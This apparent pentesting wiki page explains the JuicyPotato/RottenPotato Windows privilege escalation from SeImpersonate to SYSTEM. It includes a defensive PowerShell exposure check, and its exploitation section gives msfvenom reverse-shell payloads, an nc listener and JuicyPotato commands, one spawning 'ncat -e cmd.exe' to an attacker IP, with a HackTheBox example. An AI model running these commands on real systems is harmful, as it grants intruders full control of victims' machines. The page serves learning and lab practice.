# JuicyPotato/RottenPotato

## Short Summary

If a user account you control holds the SeImpersonate privilege (which most service accounts have), then you can escalate to SYSTEM.

*Note: This exploit was effectively **patched** in Win10 1809 and Windows Server 2019. **RoguePotato** came out after that and I don't know if/when it was patched.* [*SweetPotato*](https://github.com/CCob/SweetPotato) *aims to combine various \*potato exploits into one script for easy exploitation.*

{% embed url="https://github.com/ohpe/juicy-potato" %}

## Explanation

### Requirements

If your user has **SeImpersonate** or **SeAssignPrimaryToken** privileges then you are effectively SYSTEM. Normal users don’t usually have these, but service-level users might. You can check this with `whoami /all` under "Privileges".

You also need to be able to call a DCOM service, which:

1. implements the IMarshal interface
2. runs as an elevated user (SYSTEM, Administrator, ...)

Normally this is port 6666, but there are other such services, in case that one is blocked.
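As an added example (not code from the JuicyPotato project or from this page's author), the following PowerShell script turns the checks above into a defender-side exposure report: it parses `whoami /priv` for the two privileges named above, compares the host build against 17763 (the build number of Windows 10 1809 and Server 2019, assumed here to be the first build carrying the fix mentioned in the summary), and lists services running as the built-in service accounts, which hold SeImpersonatePrivilege by default.

```powershell
# Added example, not part of the JuicyPotato project: report whether this host
# and the current token are exposed to the technique described above.
# Assumption: Windows 10 1809 / Server 2019 (both build 17763) carry the fix,
# so anything below that build is treated as unpatched.
$fixedBuild = 17763

# Parse "whoami /priv" as CSV so we work with objects rather than free text.
$privs = whoami /priv /fo csv | ConvertFrom-Csv
$watch = @('SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege')
$held  = @($privs | Where-Object { $watch -contains $_.'Privilege Name' })

# Build number via CIM; [Environment]::OSVersion can under-report on old runtimes.
$build = [int](Get-CimInstance Win32_OperatingSystem).BuildNumber

Write-Host "User:  $(whoami)"
Write-Host "Build: $build"
foreach ($p in $held) {
    Write-Host ("Holds {0} ({1})" -f $p.'Privilege Name', $p.State)
}

if ($held.Count -gt 0 -and $build -lt $fixedBuild) {
    Write-Warning "Impersonation privilege present on a build below $fixedBuild: JuicyPotato-style escalation is possible from this token."
} elseif ($held.Count -gt 0) {
    Write-Host "Impersonation privilege present, but the build is at or past the fix; the original JuicyPotato should fail here (later variants are not assessed by this script)."
} else {
    Write-Host "No impersonation privileges in this token."
}

# Inventory: services running as LOCAL SERVICE / NETWORK SERVICE. These accounts
# hold SeImpersonatePrivilege by default, so code execution inside any of them
# (e.g. a vulnerable web application) is the usual starting point for this attack.
Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -match 'NetworkService|LocalService' } |
    Select-Object Name, StartName, State |
    Format-Table -AutoSize
```

Run it from an unprivileged prompt on the host under review; the token check reflects the account the script runs as, so repeat it for each service account you want to assess.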

### Tokens

Every process has an access token, which specifies what kinds of actions it can take. With the right privileges, Windows allows you to impersonate tokens for identification or for performing actions on another user’s behalf.

There are basically two kinds of impersonation tokens:

* Delegate/impersonate - these allow you to perform actions
* Identify/anonymous - for identification only; they don’t allow you to perform actions.

If you can obtain a delegate/impersonate-level access token with SYSTEM rights, then you can perform actions as SYSTEM.

### How It Works

How RottenPotato works at a high level:

1. Trick the “NT AUTHORITY\SYSTEM” account into authenticating via NTLM to a TCP endpoint we control.
2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the “NT AUTHORITY\SYSTEM” account. This is done through a series of Windows API calls.
3. Impersonate the token we have just negotiated. This can only be done if the attacker's current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.

## Exploitation

First of all, download the [juicypotato](https://github.com/ohpe/juicy-potato/releases) executable. If the official release isn't working, try an [x86 version](https://github.com/ivanitlearning/Juicy-Potato-x86).

You're going to need something for JuicyPotato to execute when it finishes successfully. For example, you could generate a reverse shell.

```
msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.20" LPORT=8002 -f exe > reverse.exe
```

Listen for the reverse shell on your machine:

```
nc -lnvp 8002
```

On the victim machine, execute juicypotato (in this case the x86 variant):

```
.\JuicyPotato.x86.exe -l 1337 -c "CLSID_HERE" -p C:\path\to\reverse.exe -t *
```

You're probably going to need to test multiple CLSIDs before you get a working one. [Here is a list of CLSIDs to try.](http://ohpe.it/juicy-potato/CLSID/)

For example, in the hackthebox "devel" machine, this was the successful exploit (my reverse.exe was in the inetpub/wwwroot directory):

```
.\JuicyPotato.x86.exe -l 1337 -c "{4B635ECB-0887-4015-8CA6-D621362F98D1}" -p C:\inetpub\wwwroot\reverse.exe -t *
```

Alternatively, you can use it with a static ncat.exe file:

```
.\JuicyPotato.x86.exe -l 1337 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\ncat.exe -e cmd.exe 10.10.14.17 8002" -t *
```

### External Links

{% embed url="https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/" %}
Technical explanation of RottenPotato, which JuicyPotato is based on
{% endembed %}

{% embed url="https://www.youtube.com/watch?v=QRpfvmMbDMg" %}
Blackhat technical talk about tokens
{% endembed %}

